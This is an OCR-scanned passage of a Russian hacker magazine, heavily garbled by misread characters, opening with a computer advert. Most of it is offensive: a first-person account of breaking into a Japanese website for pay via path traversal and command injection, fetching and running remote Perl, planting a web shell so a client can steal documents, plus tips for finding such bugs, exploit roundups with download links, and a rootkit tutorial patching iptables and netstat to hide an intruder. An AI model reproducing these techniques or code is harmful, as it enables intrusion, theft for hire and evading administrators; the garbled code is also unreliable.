( ѵѵѵѵѵѵ.ехсітег.сот) 



Сервисное обслуживание техники ЭКСИМЕР™ на территории РФ осуществляется НТЦ «Юнисерв» 



Спецификация и внешний вид оборудования могут быть изменены, выпуск продукции может быть прекращен в одностороннем порядке без какого-либо предварительного уведомления. Указанная информация может использоваться исключительно для заказа продукции ЭКСИМЕР™ у партнеров и не является офертой. 




Компьютер ЭКСИМЕР™ Ноте Регіотапсе предлагает великолепную 
производительность для поддержки трехмерных компьютерных игр и 
действительно реалистичное воспроизведение звука с помощью системы Оо\Ьу 
Оідііаі. Оснащенный мощным процессором Іп*еІ® Репііит® 4 с технологией 
Нурег-ТИгеасІіпд компьютер ЭКСИМЕР™ Ноте РеНотапсе сможет быстро 
выполнить одновременно несколько задач. Так что теперь Вы сможете 
приняться за игру быстрее. 




Іпіеі, ІпіеІ Іодо, ІпіеІ Іпзісіе, ІпіеІ Іпзісіе Іодо, Іпіеі Сепігіпо, Іпіеі Сепігіпо Іодо, Сѳіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗІер, Ііапіит, Репііит, и Репііит III Хеоп являются товарными знаками или 
зарегистрированными товарными знаками ІпіеІ Согрогаііоп или ее отделений в США и других странах. 

Эксимер ДМ рекомендует Місгозоіі® ѴѴіпсІоѵѵз® ХР . На компьютеры ЭКСИМЕР™ устанавливаются подлинные продукты семейства МісгозоЙ® ѴѴіпсІоѵѵз®. Гарантией качества и сервисной поддержки 
приобритаемых вами продуктов МісгозоЙ® является наличие сертификата подлинности (Сегіііісаіе оі АиШепІісііу). 







злом серьезного зарубежного сайта - дело непростое. Оно и понятно: буржуйские админы получают за свою работу кучу бабок, 
проходят всякие там сертификации и тесты на профпригодность и поэтому почти всегда тщательно настраивают файрволы и без 
проблем распознают хакерские атаки. В семье, впрочем, не без урода, в чем я недавно опять наглядно убедился. 




НПШУМЕВШИЕ ИСТОРИИ КРУПНЫХ взломов 







О днажды мне подвернулась 
возможность подзаработать. 

Я трепался в аське и вдруг 
наткнулся на сообщение от 
неизвестного чухана. Он про- 
сил украсть некоторые доку- 
менты с японского портала, 
за что обещал щедро распла- 
титься электронной валютой. Я уже работал 
с подобными людьми и поэтому особо не 
парился по поводу того, что меня могут про- 
кинуть. Обговорив цену, мы сошлись на сум- 
ме в $250, после чего неизвестная персона 
ушла в оффлайн, оставив меня наедине с 
японским ѵѵеЬ-сайтом. 



Л ПЕРВОЯ 30ЦЕПК0 

Первым делом я, вообразив себя белорус- 
ским партизаном, пропинговал жертву 
ізока.со.ір. По всей видимости, файрвол на 
серванте резал весь істр-трафик: ни один 
пакет не вернулся назад. Не знаю, зачем на- 
до было разводить такой маразм, но это же 
японцы :). Вообще, мне раньше доводилось 
обходить хорошо настроенные файрволы, 
однако такая перспектива меня не особенно 
радовала. На всякий случай я поконнектился 
на некоторые стандартные порты (21 , 22 и 
т.д.), но большинство портов были закрыты 



для соединений. Сомнительно, чтобы на 
этой машине не стояло ни Йр, ни ззМ. Ско- 
рее всего, просто эти службы закрыты для 
доступа снаружи, что, в общем -то, является 
стандартным решением. Я даже решил не 
сканить остальные порты, поскольку было 
ясно, что потенциально опасные службы на 
сервере закрыты для доступа извне, а нажи- 
вать геморрой с обходом сетевого экрана 
мне пока не хотелось. Выбирать было не из 
чего - единственный метод проникновения 
на сервер лежал через ѴѴеЬ. Главная стра- 
ничка не показала мне ничего хорошего - 
контент сайта состоял полностью из японс- 
ких иероглифов (впрочем, позже я заметил 
линк на англоязычный вариант :)). После об- 
ращения к /сді-Ьіп/ был получен от ворот по- 




ворот, что было основным симптомом де- 
фолтовой политики сервера АрасГіе. 

Казалось бы, никаких результатов. В тече- 
ние пяти минут я тыкался по ссылкам, пыта- 
ясь нащупать какой-нибудь дырявый скрипт. 
Наконец, мне повезло, я загрузил сценарий 
/сді-Ьіп/зІайз.сді. Скрипт понимал несколько 
параметров. Первый, Іуре, имел значение 
8уз. Второй, ТМе пате, передавался со значе- 
нием кигокі. Перевести загадочное имя фай- 
ла на русский язык мне так и не удалось - 
наверное, это какой-то японский сленг :). Хо- 
тя суть от этого не менялась - мне показа- 
лось, что я нащупал просто-таки детский, де- 
бильный, простите за мой французский, баг. 

Итак, я изменил значение второго пара- 
метра. Вначале я, рассчитывая неизвестно 
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ЧТОПОИОГПО МНЕ ПРИ ВЗЛОМЕ? 

О. Я никогда нѳ терял надежду на победу, поэтому всегда экс- 
периментировал. Например, я быстро обнаружил, что параметр 
ТіІе_папле может принимать значения произвольных команд. 

О. Я знаю параметры многих утилит и программ. Я без труда су- 
мел связать два приложения СЕТ и РегІ. А все потому, что перед 
этим я старательно изучил описание параметров к этим коман- 
дам. 

Ѳ. Я часто обращался за помощью к ѴѴеЬ-оболочкам типа ССІ- 
Теіпеі: и не изобретал велосипед. Действительно, ѵѵѵѵѵѵ-шелл 
ничем не хуже обычного. Главное - уметь к нему привыкнуть :). 



на что, подставил значение /еіс/раззѵѵсі и, 
естественно, жестоко обломался. Вместо 
файла с пользователями отобразилась 
ошибка 500. Я уж было подумал, что это 
своеобразный вид защиты от нападений и 
удача от меня отвернулась. Но шестое 
чувство мне подсказывало, что игра не за- 
кончена. Я еще раз изменил значение на 
что-то вроде «../../еіс/раззѵѵсі» и обновил 
страницу. Опять ошибка 500. Я добавлял 
символы «..» (это означает переход наверх в 
дереве каталогов), пока не увидел содержи- 
мое /еіс/раззѵѵсі. Хотя содержимое - громко 
сказано. Вместо целого документа на моем 
экране сияла только первая строка систем- 
ного файла. Это уже кое-что. Я могу читать 
любые доступные текущему юзеру файлы, 
точнее, первую строчку этих файлов :). 

А ДОЕШЬ КОМОНДНЫЙ РЕЖИМ! 

Впрочем, даже такая вкусная брешь в сцена- 
рии не давала мне особого повода для ра- 
дости. Чтением файлов многого не добить- 
ся. Мучаясь в размышлениях, я решил поп- 
робовать подставить команду вместо имени 
файла. Выполнение команды (пусть даже с 
выводом в одну строку) могло дать колос- 
сальные возможности. Изменив значение 
параметра ТМе пате на |ісІ| и обновив страницу, 




я буквально подпрыгнул от радости! Это 
сработало! Немного подумав, сценарий по- 
казал права текущего юзера. Теперь у меня 
был ѵѵеЬ-шелл юзера с уидом шт и группо- 
вым идентификатором ш/ѵѵдгр. 

^ анализируй это 

Настало время приступить к анализу системы. 
Ведь я еще не знал, в какие директории я 
имею право писать, какие файлы смотреть и 
выполнять. Впрочем, с такой оболочкой мно- 
гого не сделать - скрипт по-прежнему показы- 
вал лишь первую строку вывода команды. 

Первый запрос был |ипате -а|. Эта коман- 
да выдала мне сведения об установленной 
на сервере системе - я начинал вспарывать 
брюхо старой Солярке 5.6. Особенности 
этой старушки мы с тобой уже проходили :), 
поэтому ты должен знать ее уязвимости. 

Далее я отдал команду |ѵѵЬісЬ регі|, чтобы 
удостовериться в том, что интерпретатор на- 
ходится в /изг/Ьіп. К сожалению, скрипт во- 
обще ничего не вывел. Это означало, что ли- 
бо РегІ находится в /изг/ІосаІ/Ьіп, либо его 
вообще нет, а зІаЯз.сді написан на другом 
языке. Проверив патч к РегІ, я узнал, что би- 
нарник действительно расположен в 
/изг/ІосаІ/Ьіп. 

Действовать по стандартной схеме было 
бессмысленно - на сервере находился файр- 
вол. У меня было только три варианта даль- 
нейших действий: 

О. Удаленно вырубить файрвол. 

О. Замутить соппЬаск-скрипт и открыть 
на своем хосте пеісаі с прослушиванием оп- 
ределенного порта. 

Ѳ. Довольствоваться управлением через 
шт. 



СІ8С0 ПОД ПРИЦЕПОМ 

Н а вопрос, заданный в июльском номере X, мне пришло всего 
два ответа. Причем оба были не совсем правильными. Итак, 
чтобы эксплойт для диски заработал, необходимо увеличить 
размер передаваемого пакета. Кодер эксплойта этого не сде- 
лал, потому что хотел защитить свое творение от грязных рук 
скрипткидисов. Внутри исходника нужно добавить пару нуликов 
к счетчику цикла. Помимо этого в самом цикле как бы случайно 
забыт номер протокола :). Его тоже надо указать. 

Вот и все нехитрые изменения, которые надо провести, чтобы 
дьявольский бинарник заработал. Впрочем, сейчас существует 
продвинутый Сізсо СІоЬаІ Ехріоііег. В этом перловом эксплойте 
ничего править уже не надо. 



Решено было остановиться на третьем 
пункте, поскольку первые два требовали 
значительных навыков в анализе и офиги- 
тельного везения. Ни тем, ни другим, к со- 
жалению, я похвастаться не мог, поэтому ре- 
шил залить на сервер самопальный скрипт, 
который должен был полноценно выполнять 
команды. Для осуществления этой элемен- 
тарной задачи нужно скачать примерно та- 
кой самопальный скрипт: 

Код стсі.сді 

#!/и$г/ІосаІ/Ьіп/регІ 

ргіпі "Сопіепі-іуре: іехі/ІіітіѴАп"; 

$ст(1=$ЕЩ()ІОѴ_$ТРЩ 
$стсІ=~$/%20/ /д: 

$ст(1='$стсГ; 

ргіпі "<рге>$спи1<\/рге>\п": 



Подобный сценарий позволял выполнить 
практически любую команду с правами шт. 
Отправив запрос |1з -Іасі|, я узнал, что залить 
сценарий можно прямо в шт - каталог (юзер 
шт имел полные права на чтение, запись и 
выполнение файлов в этом каталоге). Только 
вот осуществить задуманное мне не удалось 
- оказалось, что скрипт зІаЯз.сді не выполня- 
ет команды с символом перенаправления 
потока (>). Ты, наверное, догадался, что я 
пытался намутить Йр-сценарий, а затем пе- 
редать его /изг/Ьіп/Йр. К сожалению, и 
ѵѵдеТа 

Внезапно я вспомнил, что все солярки по 
дефолту комплектуются перловой утилитой 
СЕТ, которая может находиться в /изг/Ьіп ли- 
бо в /изг/ІосаІ/Ьіп. Сделав запрос |1з -Іа 
/изг/ІосаІ/Ьіп/СЕГ|, я удостоверился, что сце- 
нарий действительно присутствует в систе- 
ме. Это хорошо, однако, повторюсь, что 
зіайз.сді не понимает перенаправление в 
файл, а у СЕТ нет опций, через которые 
можно было бы указать оиІриМіІе. Из выше- 
описанного можно сделать один простой вы- 
вод: ситуация опять выглядела не лучшим 
образом :). Однако я даже и не думал отчаи- 
ваться, поскольку почти сразу вспомнил, что 
интерпретатор РегІ умеет брать программу 
для выполнения прямо из стандартного 
входного потока 5ТОІІМ. И использовав кон- 
вейер из двух команд, можно было легко вы- 
полнить на уязвимой машине любой сцена- 
рий: запрос вида І/изг/ІосаІ/Ьіп/СЕТ 
Ьйр://ЬозТсотДіІе.сді | /изг/ІосаІ/Ьіп/регІ -| 
привел к тому, что скачанный файл выпол- 
нился как перловый сценарий, даже не сох- 
ранившись на сервере! Таким образом, мне 
ничего не мешало составить вспомогатель- 
ный сценарий, содержащий всего одну стро- 
ку зузіеіп ( "/изг/ІосаІ/Ьі п/С ЕТ 
Ьйр://іюзі.ш/стсІ.сді > /раіЬДо/ѵѵѵѵѵѵ/сді- 
Ьіп/стсІ.сді"). В отдельном сценарии я уже 




л Всегда ищи аль- 
тернативу ѵѵдеі’у, 
если его нет на 
сервере. Тебя 
всегда может вы- 
ручить утилита ОЕТ 
или іеісіі. 

■ 08 - 

л На нашем диске 
ты, как всегда, 
найдешь прекрас- 
ный видеоролик, 
демонстрирующий 
описанный взлом. 

л Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, и 
эта статья дана 
лишь для ознаком- 
ления и организа- 
ции правильной 
защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 




бі 





взлом по-японски 



взлом 







Заливаем командный интерпретатор 






мог юзать любые символы (и перенаправле- 
ния в том числе). 

Нужно помнить, что РегІ считывает дан- 
ные из ЗТОІІМ, пока не встретит конструкцию 
_ЕМО_. В противном случае перловый про- 
цесс осядет в таблице и будет там висеть, 
пока его не запалит злой японский админ- 
самурай :). В связи с этим я добавил вторую 
строку во временной скрипт, а затем выпол- 
нил команду. 

После успешной закачки я дал сценарию 
достаточные для выполнения права (|сНтосІ 
755 стсІ.сді|). Загрузив командную оболочку, 
я во второй раз за день получил ошибку 500. 
Это выглядело странным, ведь файл может 
выполняться, сам сценарий не содержит 
плохих команд, да и путь к интерпретатору 
указан верно. Для ясности картины я выпол- 
нил запрос |регІ -с стсІ.сді| и регІ отрапор- 
товал, что с синтаксисом все ок. 

Спустя десять минут до меня доперло, что 
баг крылся в неправильном режиме переда- 




командуй через шипи 

Н е забывай, что многие 
скрипты содержат в 
себе вкусные ошибки. Да- 
же те сценарии, которые 
были написаны кривору- 
кими программистами и 
не объявлены в баг-лис- 
те, могут содержать зна- 
чительные уязвимости. 

Вот несколько советов 
для успешного поиска по- 
добных сценариев: 

О. Обращай внимания на 
параметры с именами і\\е, ТіІе_папле, райп и т.п. Часто их значе- 
ния не проверяются на спецсимволы, и могут быть проэксплуа- 
тированы. Попробуй подставить в качестве значения 
«../../../../../е1с/раз5ѵѵсІ%00» и проверить скрипт на пиІІ-баг. 

О. Параметры типа раде, Іосаіе и т.п. позволяют организовать 
сосіе-іпзегіюп. Достаточно лишь создать файл с вредоносным 
кодом и передать в качестве страницы линк на свежесозданный 
скрипт. 

Ѳ. Пробуй изменять значения параметров сді-скриптов на | ко- 
манду |. Часто программисты не проверяют опции на наличие 
пайпа, поэтому есть определенный шанс (очень маленький, за- 
мечу), что команда будет выполнена. 

О. Если ты встречаешь всего один параметр, передаваемый 
скрипту, не исключено, что он входит в функцию зуз1:епл(). Про- 
верь это, отделив опцию от знака равенства символом «;>>. Если 
предположение верно, на экране появится выполненная сис- 
темная команда. 

г 




чи данных. Если бы я перекачал скрипт че- 
рез Йр, клиент залил файл в АЗСІІ-режиме. 
Из-за того, что СЕТ не умеет выдирать сим- 
волы \г из переданных документов, взлом- 
щик и получил ошибку 500. Для исправления 
ситуации пришлось соединиться с юниксо- 
вым Йрб и залить туда сценарий в АЗСІІ. За- 
тем перекачать обратно уже в бинарном ре- 
жиме. Я выполнил все это, затем обновил 
браузер и увидел, что командный ш/ѵѵ-шелл 
работает! 

Л ИЗМЕНЕНИЕ ПРОБИЛ 

Стянув пару нужных файлов, я скинул уве- 
домление заказчику. Спустя час он проснулся 
и объявил, что двух документов недостаточно 
и он поднимает цену до $300, если я предос- 
тавлю ему полный доступ к базе доков на 
сервере. Немного позлившись на то, что ме- 
нять правила игры после выполнения успеш- 
ного задания не принято, я согласился. 

Прежде чем давать заказчику шелл, надо 
было изменить сценарий выполнения ко- 
манд на более дружелюбную оболочку (су- 
дя по разговорам, клиенту бесполезно объ- 
яснять, что такое ОІІЕПУ ЗТПІМС :)). Я ре- 
шил воспользоваться услугами скрипта 
ССІ-ТеІпеі, о котором уже рассказывал в 
прошлых выпусках X. Теперь достаточно 
выполнить пару команд, чтобы заказчик 
мог сливать нужные файлы самостоятельно, 
потому как СЭІ-ТеІпеІ 
(ѵѵш.гоІіііаЬ.соп/сдізсгірЫсдііеІпеІіір) снабжен 
функциями скачивания и закачивания доку- 
ментов. 

Поставить СОІ-ТеІпеі несложно. Нужно 
лишь перегнать скрипт в АЗСІІ-режим и 



слегка изменить содержание вспомогатель- 
ного сценария ТИе.сді. Вот, собственно, и все 
нехитрые действия. 

СЭІ-ТеІпеІ оправдал мои ожидания. Заказ- 
чик с удовольствием заюзал эту оболочку, 
слив все данные, которые хотел. После из- 
нурительного двухчасового ожидания я полу- 
чил заслуженные $300 за прекрасную рабо- 
ту. Я был очень доволен собой, так как ни- 
когда раньше не ломал самую умную нацию 
на Земле :). Ц-Ц 
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ЗЕВІНЛОШЕНРЮІТ 
>НЗ.Х ЮСОІ ЕХРІОІТ 

описоние: 



Сейчас ты вряд ли найдешь дырявый 5егѵ-ІІ на 
раскрученном сервере. Однако мир не без доб- 
рых багоискателей: 8 августа в программном 
продукте была найдена очередная брешь, поз- 
воляющая поиметь системные привилегии. Суть 
недоработки в следующем. В ПТЮ по дефолту 
существует учетная запись локального админи- 
стратора для привилегированных операций: 
создания РТР-доменов, аккаунтов, групп и т.п. 
Этот аккаунт доступен только при соединении 
по петлевому интерфейсу. Впрочем, из-за этого 
уязвимость имеет локальный характер. Взлом- 
щику удалось отсниффать пароль для этой учет- 
ной записи и составить злой код, который пос- 
ле аутентификации создает новый домен и юзе- 
ра со всеми привилегиями. Затем эксплойт пе- 
ресылает серверу команду ЗІТЕ ЕХЕС с парамет- 
ром, заданным злоумышленником. 



защита: 



В настоящее время защититься от бага невоз- 
можно. Эксплойт успешно работает как на ста- 
рых, так и на новых релизах 5егѵ-ІІ. 



ссыпки: 



Забирай эксплойт по ссылке ѵѵѵѵѵѵі.хакер.ги/ 
ро$1/23438/ехрІоШ. Подробное описание уязви- 
мости ты можешь найти в самом исходнике. 



заокаючЕНИЕ: 



Несмотря на то, что баг локальный, хакер спосо- 
бен атаковать сервер удаленно. Ему лишь необхо- 
димо отыскать бажный ССІ/РНР-сценарий и за- 
пустить эксплойт через функцию зуз1ет(). 



ОЙЕЕТЗ: 



Поздравляем автора эксплойта Тагазсу АсипРіа с 
обнаружением столь занятного бага. А также бла- 
годарим мемберов хакерской тусы на #Ріахогсііоз 
и #ІосаІРіоз4 (ЕРИе!) за помощь в составлении 
злосчастного кода. 




ЛІИ- Р*— < 




Домен создан, команда выполнена! 



ОРОСНЕ НТТРО ОВВІТПППѴ ^ 
І.ІЖ НИР НЕП0ЕВ8 008 ЕХРШІТ 

описоние: 



Во второй ветке известного сервера АрасИе 
была обнаружена утечка памяти. Баг таится в 
релизах 2.0.46 - 2.0.49. Он позволяет любому 
злоумышленнику удаленно уронить демон. 
Собственно, уязвима всего одна функция 
ар_де*_тіте_ІпеасІег5_соге(), обрабатывающая 
заголовки. Если хакер составит очень длин- 
ный хидер, начинающийся с символов табуля- 
ции и пробелов, то ІШрсІ начнет в бешеном 
темпе жрать память. В конце концов, когда 
доступной памяти уже не останется, АрасИе 
упадет в кору. Этой баги вполне хватает для 
проведения РоЗ-атаки. 



защита: 



Существует целых два решения против этой 
уязвимости. 

О. Поставить РійрсІ 2.0.50-сІеѵ и забыть о проблеме. 
О. Наложить неофициальный патч, предлагае- 
мый разработчиком АрасРіе. Его можно найти на 
странице ѵѵѵѵѵѵ.зесигіІуІаЬ.гиМбШ.ііітІ. 



ссыпки: 



Эксплойт полностью написан на РегІ и выложен 
на твоем любимом сайте: 

шѵѵ1.хакер.ги/ро$І/23137/ехрІоШ. Развернутая ин- 
формация об ошибке доступна на странице 
ѵѵш.$есигііуІаЬ.ги/46115.МпІ. 



злоключение: 



Из-за того, что эксплойт приводит к аварийному 
завершению демона, баг не считается критичес- 
ким. Однако рекомендуется обновить АрасИе, 
поскольку в приватных источниках может нахо- 
диться куда более эффективный эксплойт. 



СЙЕЕТ8: 



Баг и эксплойт полностью принадлежат чуваку 
ЬкЫІ, который имеет собственный ѵѵеЬ-сайт 
шшіюпкег.сот. Связаться с автором можно по 
электронному адресу ЬкЫІ@сп(іопкег.пеі. 
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Бей по Рійрсі! 



НІШ00Ш8 2000 цтіитѵ 

И0ЫП6ЕП ЮСШ ЕХРЮІТ 

описоние: 



Опять винда, и опять локальный эксплойт. 
Можно подумать, что хакеры страдают нехват- 
кой прав в дырявых форточках :). Не так давно 
вышел эксплойт для довольно заплесневелого 
бага в приложении ІЛіІйу Мападег. Уязвимость 
простая, как 3 рубля, быть может, ты слышал о 
ней. Чтобы поднять права, хакер запускает 
иіііплап (менеджер запускается с системными 
привилегиями), затем вызывает справку о 
программе. После этого открывается диалог с 
запросом Иеір-файла. Взломщик заходит в ка- 
талог с:\ѵѵіпс!оѵѵ5\5у54ет32 и выбирает... 
сшсі.ехе. В итоге злоумышленник обладает 
шеллом с правами 5У5ТЕМ. 



защита: 



Единственный путь к спасению - установка пат- 
ча к иПІтап: м.тісго$оН.сот/(1оѵѵпІоа(]$/ 

(I еІаіІ$.а$рх? Ра тііуі (1=94009925-099 В-4СВ6-В51Е- 
248В4РВ8АР(Ш$р1ау1апд=еп. 



ссыпки: 



Сливай универсальный эксплойт (с поддержкой 
всех языков) по ссылке шѵѵ1.хакер.ги/ро$(/ 
22017/ехрІоШ. Исчерпывающую документацию 
читай тут: ѵѵѵѵѵѵ1.хакер.ги/розі/19120/сІеРаиІІ.а$р. 



злоключение: 



Вооружившись универсальным сплойтом, прод- 
винутые хакеры еще долго будут повышать сис- 
темные права. До тех самых пор, пока админы 
не установят спасательный патч от М3. 



6КЕЕТЗ: 



Эксплойт написан хакером Сезаг Сеггисіо. Свя- 
заться с ним можно по е-таіі здІзесФуаПоо.сот. Су- 
ществуют и другие авторы, но Цезарь выделил- 
ся тем, что наколбасил универсальный код, ра- 
ботающий даже с русской ѴѴіп2к. 
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грамотная подмЕнп системных бинорников 



И тобы бдительный админ не заметил нелегального пребывания на сервере, необходимо вооружиться хорошим руткитом. 

К сожалению, в публичных источниках сложно найти подобное творение, поэтому хакерский набор бинарников придется писать 
самому. Поверь, это несложно, тебе даже необязательно владеть языком программирования. 

Хочешь попробовать? Точи коньки! :) 




Т ы можешь поспорить: мол, за- 
чем создавать то, что уже есть? 
На самом деле все руткиты, ко- 
торые ты найдешь на хакерских 
сайтах, внесены в базу антирут- 
китов и антивирусов. Если ад- 
мин заслуженно получает свою 
зарплату, он вычислит тебя за 
один сеанс сканирования. В случае создания 
собственного руткита шансы на выживание 
резко увеличиваются. Оно понятно, ведь ад- 
мин даже не заподозрит, что его сервером 
рулит чужестранец, - ведь любимый сіік- 
гооікіі утверждает, что все в ажуре :). 



девятая СВЯТЫХ -ФАЙРВОЛ 

Добрая половина всех серверов в инете за- 
щищена огненной стеной. Если ты каким- 
либо образом эту стену преодолел, нужно 
озадачиться вопросом: как войти на сервер 
повторно? Самое простое решение - вста- 
вить исключающее правило в фильтр. При 
этом брандмауэр без лишнего геморроя те- 
бя пропустит, однако администратор может 
влегкую запалить лишнее правило. Един- 
ственный метод, который я рекомендую в 
этом случае, - модификация исходников 
файрвола. Многие боятся даже взглянуть на 
исходные тексты программ. Этот синдром 



объясняется тем, что сырцы сочиняли гра- 
мотные программисты, до которых далеко 
даже видавшему виды хакеру. На самом де- 
ле бояться чужого кода не стоит, никто же 
не заставляет тебя вникать в каждую строку 
текстового файла. От тебя требуется лишь 
найти нужный фрагмент кода и слегка под- 
корректировать его. 

Итак, как ты догадался, первым делом мы 
пропатчим файрвол. Поскольку я фанат 
пингвина, мой выбор естественным образом 
пал на известный брандмауэр ірІаЫез 
(ѵѵш.пеШІіег.огд/Ше$/іріаЫе$-1.2.11.іаг.Ь22), входящий 
в комплект любого І_іпих с ядром 2.4 и 2.6. 
Давай подумаем, что нам необходимо для 
того, чтобы бдящий админ не запалил левое 
правило. Во-первых, нужно найти фрагмент 
кода, отвечающий за распечатку правил. По 
понятным причинам я обнаружил его в ис- 
ходнике ірІаЫез.с. Во-вторых, необходимо 
создать исключающее событие, при котором 
спрятанное правило не будет выводиться на 
экран. И в-третьих, сделать патч универ- 
сальным, то есть осуществить возможность 
сохранения списка левых ір-адресов в от- 
дельном файле. 

Кстати, о файлах. В рутките зИѵ, извест- 
ном в узких кругах, встречаются файлы 
ргос.И, роііз.іі и ТіІе.М, расположенные в ка- 



талоге /изг/іпсіисіе. Я старался патчить сыр- 
цы, чтобы ты мог сам указать местонахожде- 
ние файлов с адресами. Это удобно и безо- 
пасно, ведь далеко не у каждого админа хва- 
тит ума и времени для просмотра всех сис- 
темных инклудов. 

К сожалению, я не знаток Си. Думаю, 
многие из читателей тоже не смогут пох- 
вастаться своими знаниями. Однако для 
изготовления патча тебе понадобится лишь 
консольная команда тап и немного надеж- 
ды на то, что твой не совсем умело сос- 
тавленный код скомпилится без осложне- 
ний :). Первым делом посмотри версию 
файрвола на взломанном сервере. Именно 
к этому релизу и будет наложен патч, 
только тогда есть надежда, что админ ос- 
тавит тебя в покое. Скачивай и распаковы- 
вай ірІаЫез, затем открой каким-нибудь 
редактором файл іріаЫез.с. Не буду тебя 
вынуждать на самостоятельный поиск клю- 
чевой процедуры вывода правил - она на- 
зывается ргіпНігеѵѵаІІ(). Переходи к ее на- 
чалу и в самой первой строке объяви шпи- 
онские переменные: 

РНЕ* Г; 

іпі Іоип(] = 0; 

сііаг Ые_а(1сІг[20],деі_асІ(]г[20]; 
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ВООРУЖИСЬ СВОИМ РУТКИТОМ 



Первая переменная указывает на структуру 
РНЕ. Она будет выполнять роль файлового 
дескриптора для функций Тореп, Тсіозе, ТзсапТ 
и ІеоГ. Об их назначении я скажу далее. Пере- 
менная ТоипсІ нужна для порождения исключа- 
ющего события. Если она по каким-то причи- 
нам будет отлична от нуля, значит, правило 
должно быть спрятано. В обычном режиме 
вывода ТоипсІ останется с дефолтным нулевым 
значением. И, наконец, чаровые переменные 
Місіе асісіг и деТ асІсІг будут использоваться для 
сравнения айпишников, полученных из файла 
и, собственно, из правила ірІаЫез. 

После описания важных переменных ищи 
строку кода с начальным условием іТ(ТогтаТ 
& РМТ_и N ЕМ ЦІ М В ЕРЗ ) . С этого момента на- 
чинается вывод правила на экран. Наша за- 
дача - перехватить его. Поэтому перед этой 
строчкой и расположится твой шпионский 
код. Прежде всего, сохраним адрес отправи- 
теля в переменную Місіе асісіг: 

$ргіпі1 : (ІіісІе_а(І(Іг, м %$ ,, ,а(ісІг_іо_сІоие(](&(Тѵѵ->ір.$гс))); 

Затем откроем файл, где будет распола- 
гаться список айпишников, и проанализиру- 
ем каждую строку: 

Иореп("./ірЛ"г"); 




После того как ты подключился 
к защищенной файрволом системе, 
нужно позаботиться о маскировке. 



йіІе(!(ео!(0) { 

($сап((Г%5 ,І ,деі_аі1(]г); 

ІТ ((!$ігстр(Ые_а(І(Іг,деі_а(І(Іг))) ТоипсІ = 1; 
} 

ТсІо$е({); 




Видно, что с помощью простой функции 
ТзсапТ я сохранил строку файла .[щ в перемен- 
ную деі асісіг, а затем сравнил ее значение с 
текущим значением Місіе асісіг. Если они совпа- 
ли, правило не должно быть выведено, поэтому 
значение ТоипсІ становится равным единице. 

Последней строкой патча будет условие \\ 
(ТоипсІ == 0). Не забудь поставить закрыва- 
ющую скобку в самом конце процедуры. За- 
тем, для красоты, можно вместо названия 
файла написать РАТНІРРИЕ, а в начале ірі- 
аЫез.с объявить значение макроса равным 
./ірі (или указать более разумный путь). Те- 
перь можно смело компилировать файрвол. 
Не забудь создать файл с исключающими 
адресами и проверить работу шпионского 
патча. Если ірТаЫез фильтрует твои правила, 
клади бинарник в /зЬіп вместо системного. 



Р03Б0Р ПОЛЕТОВ 



П омимо вкусностей, данный руткит содержит и некоторые ба- 
ги. Патч для ІрТаЫез скрывает правила с определенными ад- 
ресами, но, к сожалению, неправильно нумерует листе рулеса- 
ми. Что касается фикса к пеІзМ'у, здесь тоже не обошлось без 
глюков: бинарник не фильтрует вывод инфы об иф-соединени- 
ях и открытых портах. При большом желании весь список неуч- 
тенных багов можно пофиксить, все зависит только от тебя. 
Кстати, описанный в февральском выпуске X элитный бэкдор 
отлично уживается в комплекте с самопальными патчами. 
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На самом деле баг с номером очень легко фиксится 




Все хакерские исходники ты можешь слить по адресу 
Шр://катеп5к.пеІ.шДогЬ/1 /х/гооІкіІ_5оигсеДаг.д2. Если 
вдруг у тебя появятся свежие идеи относительно моего (или 
твоего) руткита, можешь смело писать на мыло, - с удоволь- 
ствием разделю твое мнение :). 



И не забудь изменить дату создания файла 
/зЬіп/ірІаЫез (некоторые утилиты безопас- 
ности проверяют ее). 

Л СЕТЕВПЯ НЕВИДИМОСТЬ 



После того как ты подключился к защи- 
щенной файрволом системе, нужно позабо- 
титься о маскировке твоего соединения. 

Речь идет о сетевой команде пе№1 (пожа- 
луй, самая любимая команда администрато- 
ров :)). Для ее патчинга придется слить па- 
кет под названием пеМооІз 
(Шр:/Лге$ІптеаЕпеі/гесІіг/пеМ:ооІ$/7026/игІ_Ь22/пеНооІ$- 
І.бО.ІагМ) и немного поменять содержимое 
файла пе№Ес. Патч к этой утилите не по- 
хож на модификацию ірІаЫез, однако я ста- 
рался сделать шпионское обновление очень 
простым и удобным. После распаковки архи- 
ва запусти команду таке. Интерактивный 
скрипт спросит у тебя сведения о системе. 
Постарайся говорить ему правду :). В про- 
тивном случае админу покажется немного 
странным, что пеМаІ вдруг перестал выво- 
дить статистику по ІРѴ6 и ІРХ-протоколам, 
если таковые имелись в наличии. 

Дождись, пока соберутся все сетевые ути- 
литы. После этого переходи в каталог зге и 
открой файл пе&М.с. Процедура, в которую 
мы внедрим посторонний код, называется 
іер сіо опе(). Она вызывается для каждого се- 
тевого процесса в Іср_іпк)(). Встаем на начало 
кода и объявляем макрос РАТН ІР РИЕ. Его 
значение оформи в виде пути к айпишникам, 
которые скрываются файрволом (убьешь двух 
зайцев сразу), либо к отдельному конфигу. 

В начале кода появятся новые перемен- 
ные чарового типа заѵе_асІсІг, Місіе асісіг, це- 
лочисленный Місіе и файловый зТМе. В прин- 
ципе, подобный набор юзался в патче к 
файрволу, поэтому объяснять предназначе- 
ние каждой переменной я не буду. Обращу 
внимание, что, помимо переменных, необхо- 
димо объявить две структуры для превраще- 
ния хоста в читабельный ір-адрес: 



* 3 ^ 

л Руткит тестиро- 
вался в системе 
АІШпих 2.2, на яд- 
ре 2.4.24. 

л Если тебе непо- 
нятна работа сиш- 
ной функции пре- 
образования адре- 
са, выполни ко- 
манду тап деіііозі- 
Ьупате. 




а Настоятельно ре- 
комендую тебе по- 
читать статью 
«Хакнутый зузіод 
на страже поряд- 
ка», в которой рас- 
сказывается о том, 
как грамотно пря- 
тать целые участки 
файловой системы 
ипіх. 
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л На компакте ты 
найдешь все патчи 
из этой статьи, а 
также последние 
версии проектов, к 
которым эти хот- 
фиксы накладыва- 
лись. 

а Не стоит забы- 
вать, что эта статья 
дана лишь для оз- 
накомления и орга- 
низации правиль- 
ной защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 



$ігисі ііиМг сІіескаМг; 

$ігисі аГСуре *ар; 

Теперь найди строку зігсаі(гет_асІсІг, «:»);. 
Она, по всей вероятности, приписывает к 
